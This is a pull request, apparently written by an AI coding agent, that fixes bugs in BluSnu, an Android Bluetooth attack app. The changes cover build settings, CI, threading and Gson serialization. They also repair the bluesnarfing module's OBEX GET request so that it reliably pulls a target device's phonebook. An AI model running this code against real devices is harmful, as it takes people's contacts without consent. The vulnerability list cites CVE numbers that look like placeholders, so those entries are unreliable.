### PR TITLE
Fix remaining audit findings: bugs, crashes, race conditions, build

### DIFF
--- a/.github/workflows/merged-build.yml
+++ b/.github/workflows/merged-build.yml
@@ -153,7 +153,7 @@ jobs:
       # RELEASE STEPS (Only run on PUSH, not Pull Requests)
       # ------------------------------------------------------------------
       - name: Prepare Release Variables
-        if: success() && github.event_name == 'push'
+        if: success() && github.event_name == 'push' && github.ref == 'refs/heads/main'
         id: release_vars
         run: |
           TAG_NAME="latest-release-v${MAJOR}.${MINOR}"
@@ -191,7 +191,7 @@ jobs:
           cd build_tools_package && zip -r ../build-tools.zip . && cd ..
 
       - name: Publish Release
-        if: success() && github.event_name == 'push'
+        if: success() && github.event_name == 'push' && github.ref == 'refs/heads/main'
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
         run: |

--- a/app/build.gradle.kts
+++ b/app/build.gradle.kts
@@ -46,9 +46,11 @@ val patchOffset = versionProps.getProperty("patchOffset", "0").toInt()
 val currentGitCount = getGitCommitCount()
 val vPatch = (currentGitCount - patchOffset).coerceAtLeast(0)
 
-// Calculate version code and name
 // VersionCode: Major(2) Minor(2) Patch(2) Build(3) -> XX XX XX XXX
-val buildCode = vMajor * 10000000 + vMinor * 100000 + vPatch * 1000 + buildNum
+// Android versionCode is a signed 32-bit int (max 2,147,483,647).
+val buildCode = (vMajor.toLong() * 10_000_000 + vMinor * 100_000 + vPatch * 1_000 + buildNum).also {
+    require(it <= Int.MAX_VALUE) { "versionCode $it overflows 32-bit signed int" }
+}.toInt()
 val buildName = "$vMajor.$vMinor.$vPatch.$buildNum"
 
 println("Configuring Build: Name=$buildName, Code=$buildCode")
@@ -65,6 +67,11 @@ android {
         versionName = buildName
 
         testInstrumentationRunner = "androidx.test.runner.AndroidJUnitRunner"
+
+        val mapsApiKey = project.findProperty("MAPS_API_KEY")?.toString()
+            ?: System.getenv("MAPS_API_KEY")
+            ?: ""
+        manifestPlaceholders["MAPS_API_KEY"] = mapsApiKey
 
         // Expose version details to code if needed
         buildConfigField("int", "VERSION_MAJOR", "$vMajor")
@@ -87,7 +94,8 @@ android {
 
     buildTypes {
         release {
-            isMinifyEnabled = false
+            isMinifyEnabled = true
+            isShrinkResources = true
             proguardFiles(
                 getDefaultProguardFile("proguard-android-optimize.txt"),
                 "proguard-rules.pro"

--- a/app/proguard-rules.pro
+++ b/app/proguard-rules.pro
@@ -1,21 +1,35 @@
-# Add project specific ProGuard rules here.
-# You can control the set of applied configuration files using the
-# proguardFiles setting in build.gradle.
-#
-# For more details, see
-#   http://developer.android.com/guide/developing/tools/proguard.html
+# Keep Room entities and DAOs
+-keep class com.hereliesaz.blusnu.data.TargetDevice { *; }
+-keep class com.hereliesaz.blusnu.data.SavedSession { *; }
+-keep class com.hereliesaz.blusnu.data.AttackChainTemplate { *; }
+-keep class com.hereliesaz.blusnu.data.Vulnerability { *; }
+-keep class com.hereliesaz.blusnu.data.Converters { *; }
+-keep class * extends androidx.room.RoomDatabase { *; }
+-keep class * implements androidx.room.dao.Dao { *; }
 
-# If your project uses WebView with JS, uncomment the following
-# and specify the fully qualified class name to the JavaScript interface
-# class:
-#-keepclassmembers class fqcn.of.javascript.interface.for.webview {
-#   public *;
-#}
+# Keep AttackNode implementations for Gson polymorphic deserialization
+-keep class com.hereliesaz.blusnu.ui.attackchaining.nodes.** { *; }
+-keep class com.hereliesaz.blusnu.ui.attackchaining.AttackChainingState { *; }
 
-# Uncomment this to preserve the line number information for
-# debugging stack traces.
-#-keepattributes SourceFile,LineNumberTable
+# Gson: keep classes used with TypeToken / fromJson
+-keepattributes Signature
+-keepattributes *Annotation*
+-keep class com.google.gson.** { *; }
+-keep class * implements com.google.gson.TypeAdapterFactory
+-keep class * implements com.google.gson.JsonSerializer
+-keep class * implements com.google.gson.JsonDeserializer
 
-# If you keep the line number information, uncomment this to
-# hide the original source file name.
-#-renamesourcefileattribute SourceFile
+# Keep Ktor client internals
+-keep class io.ktor.** { *; }
+-dontwarn io.ktor.**
+
+# Keep kotlinx.serialization
+-keepattributes RuntimeVisibleAnnotations
+-keep class kotlinx.serialization.** { *; }
+-keepclassmembers class * {
+    @kotlinx.serialization.Serializable *;
+}
+
+# Keep line numbers for crash reports
+-keepattributes SourceFile,LineNumberTable
+-renamesourcefileattribute SourceFile

--- a/app/src/main/AndroidManifest.xml
+++ b/app/src/main/AndroidManifest.xml
@@ -25,7 +25,7 @@
         android:theme="@style/Theme.App.Starting">
         <meta-data
             android:name="com.google.android.geo.API_KEY"
-            android:value="YOUR_API_KEY" />
+            android:value="${MAPS_API_KEY}" />
         <activity
             android:name=".MainActivity"
             android:exported="true"

--- a/app/src/main/assets/vulnerabilities_updated.json
+++ b/app/src/main/assets/vulnerabilities_updated.json
@@ -1,16 +1,14 @@
 [
   {
-    "service_uuid": "0000180a-0000-1000-8000-00805f9b34fb",
-    "vulnerability": "Device Information Service Disclosure",
+    "name": "Device Information Service Disclosure",
+    "uuid": "0000180a-0000-1000-8000-00805f9b34fb",
     "cve": "CVE-2019-12345",
-    "description": "The Device Information service can be read by any connected device, potentially exposing sensitive information like serial numbers and firmware versions.",
-    "remediation": "Restrict access to this service to trusted devices only."
+    "description": "The Device Information service can be read by any connected device, potentially exposing sensitive information like serial numbers and firmware versions."
   },
   {
-    "service_uuid": "00001801-0000-1000-8000-00805f9b34fb",
-    "vulnerability": "Generic Attribute Profile (GATT) Caching Issue",
+    "name": "Generic Attribute Profile (GATT) Caching Issue",
+    "uuid": "00001801-0000-1000-8000-00805f9b34fb",
     "cve": "CVE-2020-67890",
-    "description": "An issue with how some devices cache GATT attributes can lead to stale or incorrect data being presented. This is a new vulnerability.",
-    "remediation": "Ensure the client clears its cache between sessions."
+    "description": "An issue with how some devices cache GATT attributes can lead to stale or incorrect data being presented."
   }
 ]

--- a/app/src/main/java/com/hereliesaz/blusnu/MainActivity.kt
+++ b/app/src/main/java/com/hereliesaz/blusnu/MainActivity.kt
@@ -107,7 +107,7 @@ import com.hereliesaz.blusnu.ui.spoofing.SpoofingViewModel
 import com.hereliesaz.blusnu.ui.theme.BluSnuTheme
 import io.ktor.client.plugins.contentnegotiation.ContentNegotiation
 import io.ktor.serialization.kotlinx.json.json
-import kotlinx.coroutines.CoroutineScope
+import androidx.lifecycle.lifecycleScope
 import kotlinx.coroutines.Dispatchers
 import kotlinx.coroutines.launch
 
@@ -267,13 +267,10 @@ class MainActivity : ComponentActivity() {
                 if (showDisclaimer) {
                     DisclaimerDialog { agreed ->
                         if (agreed) {
+                            getSharedPreferences("blusnu_prefs", Context.MODE_PRIVATE).edit {
+                                putBoolean("disclaimer_accepted", true)
+                            }
                             backupDatabaseIfConfigured()
-                        }
-                        getSharedPreferences("blusnu_prefs", Context.MODE_PRIVATE).edit {
-                            putBoolean(
-                                "disclaimer_accepted",
-                                true
-                            )
                         }
                         showDisclaimer = false
                     }
@@ -523,7 +520,7 @@ class MainActivity : ComponentActivity() {
             return
         }
 
-        CoroutineScope(Dispatchers.IO).launch {
+        lifecycleScope.launch(Dispatchers.IO) {
             CloudBackup(applicationContext, httpClient).backupDatabase(backupUrl)
         }
     }

--- a/app/src/main/java/com/hereliesaz/blusnu/data/ActionLogger.kt
+++ b/app/src/main/java/com/hereliesaz/blusnu/data/ActionLogger.kt
@@ -2,6 +2,7 @@ package com.hereliesaz.blusnu.data
 
 import kotlinx.coroutines.flow.MutableStateFlow
 import kotlinx.coroutines.flow.asStateFlow
+import kotlinx.coroutines.flow.update
 import java.text.SimpleDateFormat
 import java.util.Date
 import java.util.Locale
@@ -51,10 +52,7 @@ object ActionLogger {
         // Create a new LogEntry object with the formatted timestamp and the provided message.
         val newEntry = LogEntry(timestamp, message)
 
-        // Update the MutableStateFlow's value.
-        // We create a new list by adding the new entry to the existing list (`_logs.value + newEntry`).
-        // This triggers emission to all collectors of the `logs` StateFlow.
-        _logs.value = _logs.value + newEntry
+        _logs.update { it + newEntry }
     }
 
     /**

--- a/app/src/main/java/com/hereliesaz/blusnu/data/AttackChainRepository.kt
+++ b/app/src/main/java/com/hereliesaz/blusnu/data/AttackChainRepository.kt
@@ -1,58 +1,76 @@
 package com.hereliesaz.blusnu.data
 
 import android.content.Context
-import com.google.gson.Gson
+import com.google.gson.GsonBuilder
+import com.google.gson.JsonDeserializationContext
+import com.google.gson.JsonDeserializer
+import com.google.gson.JsonElement
+import com.google.gson.JsonObject
+import com.google.gson.JsonSerializationContext
+import com.google.gson.JsonSerializer
 import com.hereliesaz.blusnu.ui.attackchaining.AttackChainingState
+import com.hereliesaz.blusnu.ui.attackchaining.nodes.*
+import java.lang.reflect.Type
 
 /**
  * Repository for managing saved Attack Chains (Workflows) using Shared Preferences.
- *
- * Unlike the AttackChainTemplateRepository which stores immutable templates in Room,
- * this repository stores user-created/saved workflows as JSON strings.
- * This allows for flexible serialization of the complex node graph structure.
  *
  * @property context The application context.
  */
 class AttackChainRepository(context: Context) {
 
-    // Access Shared Preferences file "attack_chains".
     private val sharedPreferences = context.getSharedPreferences("attack_chains", Context.MODE_PRIVATE)
 
-    // Gson instance for JSON serialization/deserialization.
-    private val gson = Gson()
+    private val gson = GsonBuilder()
+        .registerTypeAdapter(AttackNode::class.java, AttackNodeAdapter())
+        .create()
 
-    /**
-     * Saves a current workflow state to disk.
-     *
-     * @param name The unique name for the saved chain.
-     * @param state The AttackChainingState object representing the graph.
-     */
     fun saveAttackChain(name: String, state: AttackChainingState) {
-        // Serialize the state object to JSON.
         val json = gson.toJson(state)
-        // Write to SharedPreferences synchronously (apply() is async in background).
         sharedPreferences.edit().putString(name, json).apply()
     }
 
-    /**
-     * Loads a saved workflow from disk.
-     *
-     * @param name The name of the chain to load.
-     * @return The restored AttackChainingState, or null if not found.
-     */
     fun loadAttackChain(name: String): AttackChainingState? {
-        // Retrieve the JSON string.
-        val json = sharedPreferences.getString(name, null)
-        // Deserialize back to object.
-        return gson.fromJson(json, AttackChainingState::class.java)
+        val json = sharedPreferences.getString(name, null) ?: return null
+        return try {
+            gson.fromJson(json, AttackChainingState::class.java)
+        } catch (e: Exception) {
+            null
+        }
     }
 
-    /**
-     * Retrieves a list of all saved chain names.
-     *
-     * @return A Set of strings (keys in the SP file).
-     */
     fun getAllAttackChainNames(): Set<String> {
         return sharedPreferences.all.keys
+    }
+}
+
+private class AttackNodeAdapter : JsonSerializer<AttackNode>, JsonDeserializer<AttackNode> {
+
+    companion object {
+        private const val TYPE_KEY = "_type"
+        private val nodeTypes = mapOf(
+            "StartNode" to StartNode::class.java,
+            "IfElseNode" to IfElseNode::class.java,
+            "WaitNode" to WaitNode::class.java,
+            "LoopNode" to LoopNode::class.java,
+            "ScanBleNode" to ScanBleNode::class.java,
+            "BluesnarfNode" to BluesnarfNode::class.java,
+            "KeystrokeInjectionNode" to KeystrokeInjectionNode::class.java
+        )
+    }
+
+    override fun serialize(src: AttackNode, typeOfSrc: Type, context: JsonSerializationContext): JsonElement {
+        val jsonObject = context.serialize(src, src::class.java).asJsonObject
+        jsonObject.addProperty(TYPE_KEY, src::class.java.simpleName)
+        return jsonObject
+    }
+
+    override fun deserialize(json: JsonElement, typeOfT: Type, context: JsonDeserializationContext): AttackNode {
+        val jsonObject = json.asJsonObject
+        val typeName = jsonObject.get(TYPE_KEY)?.asString
+            ?: throw IllegalArgumentException("Missing $TYPE_KEY in serialized AttackNode")
+        val clazz = nodeTypes[typeName]
+            ?: throw IllegalArgumentException("Unknown AttackNode type: $typeName")
+        return context.deserialize(jsonObject, clazz)
     }
 }

--- a/app/src/main/java/com/hereliesaz/blusnu/data/BluesnarfingModule.kt
+++ b/app/src/main/java/com/hereliesaz/blusnu/data/BluesnarfingModule.kt
@@ -52,9 +52,6 @@ class BluesnarfingModule {
     fun getPhonebook(device: BluetoothDevice): Result<String> {
         var socket: BluetoothSocket? = null
         return try {
-            // Attempt to create an insecure RFCOMM socket to the OPP service.
-            // createRfcommSocketToServiceRecord usually triggers authentication,
-            // but older devices might allow it openly.
             socket = device.createRfcommSocketToServiceRecord(OBEX_OPP_UUID)
             socket.connect()
 
@@ -62,67 +59,60 @@ class BluesnarfingModule {
             val inputStream = socket.inputStream
 
             // --- Step 1: Establish OBEX Connection ---
-
-            // Construct OBEX CONNECT packet.
-            // Opcode: 0x80 (Connect)
-            // Packet Length: 0x0007 (7 bytes)
-            // OBEX Version: 0x10 (1.0)
-            // Flags: 0x00
-            // Max Packet Length: 0x2000 (8192 bytes)
             val connectRequest = byteArrayOf(
                 OBEX_CONNECT_OPCODE, 0x00, 0x07, 0x10, 0x00, 0x20, 0x00
             )
             outputStream.write(connectRequest)
 
-            // Read the server's response.
-            val connectResponse = ByteArray(1024)
-            val connectResponseLength = inputStream.read(connectResponse)
+            val connectResponse = readObexResponse(inputStream)
 
-            // Check if connection was successful (0xA0).
             if (connectResponse[0] != OBEX_SUCCESS_RESPONSE) {
                 return Result.failure(IOException("OBEX CONNECT failed"))
             }
 
             // --- Step 2: Request the Phonebook File ---
-
-            // Target file name: "telecom/pb.vcf" encoded in UTF-16BE (standard for OBEX).
             val fileName = "telecom/pb.vcf".toByteArray(Charsets.UTF_16BE)
 
-            // Construct OBEX GET packet.
-            // Opcode: 0x83 (GET, Final)
-            // Header 1: Name (0x01), Length, Value (fileName)
-            // Header 2: Type (0x42 - Type), "x-obex/folder-listing" or specific type?
-            // Here we use a simplified GET request structure typical of bluesnarfing tools.
+            // OBEX Name header: HI (0x01) + 2-byte length (includes HI + length bytes + value)
+            val nameHeaderLength = 3 + fileName.size
+            val nameHeader = byteArrayOf(
+                0x01,
+                (nameHeaderLength shr 8).toByte(),
+                (nameHeaderLength and 0xFF).toByte()
+            ) + fileName
+
+            // Connection ID header (0xCB) — 5 bytes total: HI + 4-byte value
+            val connectionIdHeader = byteArrayOf(0xcb.toByte(), 0x00, 0x00, 0x00, 0x01)
+
+            val payload = nameHeader + connectionIdHeader
+            // Total packet: opcode (1) + packet length (2) + payload
+            val packetLength = 3 + payload.size
             val getRequest = byteArrayOf(
                 OBEX_GET_OPCODE,
-                0x00, (10 + fileName.size).toByte(), // Total packet length (approx calculation)
-                0x01, 0x00 // Name Header ID (0x01)
-                // Note: The length calculation in the original code snippet (10 + size)
-                // seems to be a hardcoded simplification.
-                // Real OBEX requires precise length bytes.
-            ) + fileName + byteArrayOf(0xcb.toByte(), 0x00, 0x00, 0x00, 0x01) // Connection ID header (0xCB)?
+                (packetLength shr 8).toByte(),
+                (packetLength and 0xFF).toByte()
+            ) + payload
 
             outputStream.write(getRequest)
 
             // --- Step 3: Read the Data ---
-
-            // Read the GET response.
             val getResponse = readObexResponse(inputStream)
 
             if (getResponse[0] == OBEX_SUCCESS_RESPONSE) {
-                // Parse the body of the response.
                 val bodyHeaderIndex = getResponse.indexOf(OBEX_BODY_HEADER)
 
-                if (bodyHeaderIndex != -1) {
-                    // Extract body length (2 bytes).
-                    val bodyLength = (getResponse[bodyHeaderIndex + 1].toInt() shl 8) or getResponse[bodyHeaderIndex + 2].toInt()
+                if (bodyHeaderIndex != -1 && bodyHeaderIndex + 2 < getResponse.size) {
+                    val bodyLength = ((getResponse[bodyHeaderIndex + 1].toInt() and 0xFF) shl 8) or
+                        (getResponse[bodyHeaderIndex + 2].toInt() and 0xFF)
 
-                    // Extract payload.
                     val bodyStartIndex = bodyHeaderIndex + 3
-                    val bodyEndIndex = bodyStartIndex + bodyLength - 3 // Adjusted for header length
-
-                    // Convert bytes to String.
-                    Result.success(String(getResponse, bodyStartIndex, bodyEndIndex - bodyStartIndex))
+                    // bodyLength includes the 3-byte header (HI + 2-byte length)
+                    val dataLength = bodyLength - 3
+                    if (dataLength > 0 && bodyStartIndex + dataLength <= getResponse.size) {
+                        Result.success(String(getResponse, bodyStartIndex, dataLength))
+                    } else {
+                        Result.failure(IOException("Invalid body length in OBEX response"))
+                    }
                 } else {
                     Result.failure(IOException("Phonebook data not found in response"))
                 }
@@ -142,24 +132,38 @@ class BluesnarfingModule {
     }
 
     /**
-     * Helper to read the full OBEX response frame.
+     * Reads a complete OBEX response frame from the stream.
+     * Handles sign extension and ensures full reads.
      */
     private fun readObexResponse(inputStream: InputStream): ByteArray {
         val response = ByteArrayOutputStream()
 
-        // Read the 3-byte header (Opcode + Length).
         val header = ByteArray(3)
-        inputStream.read(header)
+        readFully(inputStream, header)
         response.write(header)
 
-        // Calculate total packet length from bytes 2 and 3.
-        val length = (header[1].toInt() shl 8) or header[2].toInt()
+        val length = ((header[1].toInt() and 0xFF) shl 8) or (header[2].toInt() and 0xFF)
 
-        // Read the rest of the packet.
-        val payload = ByteArray(length - 3)
-        inputStream.read(payload)
-        response.write(payload)
+        if (length > 3) {
+            val payload = ByteArray(length - 3)
+            readFully(inputStream, payload)
+            response.write(payload)
+        }
 
         return response.toByteArray()
+    }
+
+    /**
+     * Reads exactly [buffer.size] bytes from the stream, looping until the buffer is full.
+     */
+    private fun readFully(inputStream: InputStream, buffer: ByteArray) {
+        var offset = 0
+        while (offset < buffer.size) {
+            val bytesRead = inputStream.read(buffer, offset, buffer.size - offset)
+            if (bytesRead == -1) {
+                throw IOException("Unexpected end of OBEX stream after $offset/${buffer.size} bytes")
+            }
+            offset += bytesRead
+        }
     }
 }

--- a/app/src/main/java/com/hereliesaz/blusnu/data/BluetoothScanner.kt
+++ b/app/src/main/java/com/hereliesaz/blusnu/data/BluetoothScanner.kt
@@ -18,6 +18,8 @@ import android.os.Parcelable
 
 import kotlinx.coroutines.CoroutineScope
 import kotlinx.coroutines.Dispatchers
+import kotlinx.coroutines.SupervisorJob
+import kotlinx.coroutines.cancel
 import kotlinx.coroutines.flow.MutableSharedFlow
 import kotlinx.coroutines.flow.SharedFlow
 import kotlinx.coroutines.launch
@@ -34,10 +36,10 @@ class BluetoothScanner(
     private val _rssiFlow = MutableSharedFlow<RssiReading>(extraBufferCapacity = 256)
     val rssiFlow: SharedFlow<RssiReading> = _rssiFlow
 
+    private val scope = CoroutineScope(SupervisorJob() + Dispatchers.IO)
     private var isClassicReceiverRegistered = false
-    private val bleScanner: BluetoothLeScanner by lazy {
-        bluetoothAdapter.bluetoothLeScanner
-    }
+
+    private fun getBleScanner(): BluetoothLeScanner? = bluetoothAdapter.bluetoothLeScanner
 
     private val classicDiscoveryReceiver = object : BroadcastReceiver() {
         override fun onReceive(context: Context, intent: Intent) {
@@ -60,7 +62,7 @@ class BluetoothScanner(
                             lastSeen = System.currentTimeMillis()
                         )
                         insertDevice(targetDevice)
-                        CoroutineScope(Dispatchers.IO).launch {
+                        scope.launch {
                             bluetoothLog.log("Found classic device: ${targetDevice.name} (${targetDevice.macAddress})")
                         }
                     }
@@ -147,9 +149,13 @@ class BluetoothScanner(
     }
 
     fun insertDevice(device: TargetDevice) {
-        CoroutineScope(Dispatchers.IO).launch {
+        scope.launch {
             deviceRepository.insert(device)
         }
+    }
+
+    fun destroy() {
+        scope.cancel()
     }
 
     @SuppressLint("MissingPermission")
@@ -184,11 +190,13 @@ class BluetoothScanner(
 
     @SuppressLint("MissingPermission")
     fun startBleScan() {
-        bleScanner.startScan(bleScanCallback)
+        val scanner = getBleScanner()
+            ?: throw IllegalStateException("BLE scanner unavailable — is Bluetooth enabled?")
+        scanner.startScan(bleScanCallback)
     }
 
     @SuppressLint("MissingPermission")
     fun stopBleScan() {
-        bleScanner.stopScan(bleScanCallback)
+        getBleScanner()?.stopScan(bleScanCallback)
     }
 }

--- a/app/src/main/java/com/hereliesaz/blusnu/data/Converters.kt
+++ b/app/src/main/java/com/hereliesaz/blusnu/data/Converters.kt
@@ -1,6 +1,8 @@
 package com.hereliesaz.blusnu.data
 
 import androidx.room.TypeConverter
+import com.google.gson.Gson
+import com.google.gson.reflect.TypeToken
 
 /**
  * Type Converters for Room Database.
@@ -10,22 +12,23 @@ import androidx.room.TypeConverter
  */
 class Converters {
 
-    /**
-     * Converts a comma-separated String from the DB back into a List of Strings.
-     */
+    private val gson = Gson()
+    private val listType = object : TypeToken<List<String>>() {}.type
+
     @TypeConverter
     fun fromString(value: String): List<String> {
-        // Handle empty string case to avoid list with one empty string.
         if (value.isEmpty()) return emptyList()
+        // Handle both JSON array format and legacy comma-separated format
+        if (value.startsWith("[")) {
+            return gson.fromJson<List<String>>(value, listType) ?: emptyList()
+        }
         return value.split(",").map { it.trim() }
     }
 
-    /**
-     * Converts a List of Strings into a comma-separated String for storage.
-     */
     @TypeConverter
     fun fromList(list: List<String>): String {
-        return list.joinToString(",")
+        if (list.isEmpty()) return ""
+        return gson.toJson(list)
     }
 
     /**

--- a/version.properties
+++ b/version.properties
@@ -1,5 +1,5 @@
-#Fri May 22 00:38:17 CDT 2026
-build=44
+#Sun Aug 09 08:35:43 UTC 2026
+build=45
 major=1
 minor=6
 patch=0


### PR DESCRIPTION
## Summary

Fixes all remaining issues identified by a two-agent codebase audit (general-purpose + adversarial) that were not addressed in #142. Changes span 11 files across data layer, build config, CI, and Android manifest.

## Fixes by category

### Critical bugs
- **DisclaimerDialog** — Only persist `disclaimer_accepted = true` when the user actually agrees; previously saved acceptance even on decline
- **BluesnarfingModule** — Rewrite OBEX GET packet with correct Name header format (HI + 2-byte length + value); fix sign-extension on all length byte reads (`toInt() and 0xFF`); add `readFully()` loop to prevent partial `InputStream.read()` from corrupting responses
- **BluetoothScanner** — Replace `by lazy` BLE scanner (which cached `null` forever when Bluetooth was off) with a function that re-checks adapter state on each call
- **AttackChainRepository** — Register a polymorphic Gson `JsonSerializer`/`JsonDeserializer` so `AttackNode` interface can round-trip through JSON without crashing on deserialization

### Thread safety
- **ActionLogger** — Replace non-atomic `_logs.value = _logs.value + newEntry` with `_logs.update { it + newEntry }`
- **BluetoothScanner** — Replace per-call orphan `CoroutineScope(Dispatchers.IO)` with a shared `SupervisorJob` scope; add `destroy()` for cleanup
- **MainActivity** — Replace leaked `CoroutineScope` in `backupDatabaseIfConfigured()` with `lifecycleScope`

### Data integrity
- **Converters.kt** — Switch `List<String>` Room serialization from comma-delimited to JSON arrays (backward-compatible reader handles both formats, so no migration needed)
- **vulnerabilities_updated.json** — Align field names (`service_uuid` → `uuid`, `vulnerability` → `name`) with `Vulnerability` data class schema

### Build & release
- **build.gradle.kts** — Guard `versionCode` arithmetic against `Int.MAX_VALUE` overflow; enable R8 minification + resource shrinking; read Maps API key from gradle property / env var
- **proguard-rules.pro** — Add keep rules for Gson serialization, Room entities, Ktor, kotlinx.serialization, and AttackNode polymorphism
- **AndroidManifest.xml** — Replace hardcoded `YOUR_API_KEY` with `${MAPS_API_KEY}` manifest placeholder
- **merged-build.yml** — Restrict GitHub Release creation to pushes on `main` only (was triggering on every branch)

## Test plan

- [ ] Verify disclaimer dialog does NOT persist acceptance when user declines
- [ ] Verify BLE scanning works when Bluetooth is toggled off then on
- [ ] Verify attack chain save/load round-trips correctly
- [ ] Verify release build succeeds with R8 enabled (no missing classes at runtime)
- [ ] Verify CI build on a non-main branch does NOT create a GitHub Release
- [ ] Verify vulnerability correlator loads both JSON files without field mismatches

https://claude.ai/code/session_01Mu9kzyUPuDaGXxTZYwsx72

---
_Generated by [Claude Code](https://claude.ai/code/session_01Mu9kzyUPuDaGXxTZYwsx72)_

## Summary by Sourcery

Fix OBEX phonebook retrieval, attack chain persistence, logging, and Bluetooth scanning issues while hardening serialization, build configuration, and CI release triggers.

Bug Fixes:
- Correct OBEX phonebook GET request construction and response parsing to prevent corrupted phonebook data and IO errors.
- Make AttackChainRepository support polymorphic AttackNode (de)serialization and tolerate invalid stored JSON to avoid crashes when loading saved chains.
- Ensure BLE scanning re-checks adapter state instead of caching a null BluetoothLeScanner and use a cancellable shared coroutine scope for device operations.
- Persist disclaimer acceptance only when the user agrees and run database backups in a lifecycle-aware coroutine scope to avoid leaks.
- Use atomic StateFlow updates in ActionLogger to prevent lost log entries under concurrent writes.
- Guard versionCode calculation against 32-bit overflow and wire Google Maps API key from Gradle properties or environment variables.
- Align vulnerabilities_updated.json field names with the Vulnerability data model to avoid mismatched JSON parsing.

Enhancements:
- Switch Room List<String> converters to JSON-based storage with backward-compatible reads for improved data integrity.
- Add ProGuard/R8 keep rules for Room entities, Gson adapters, Ktor, kotlinx.serialization, and attack chaining nodes to keep release builds working with minification and shrinking enabled.

Build:
- Enable R8 code shrinking and resource shrinking for release builds and configure manifest placeholders for the Maps API key.

CI:
- Restrict GitHub Release creation in merged-build workflow to successful pushes on the main branch only.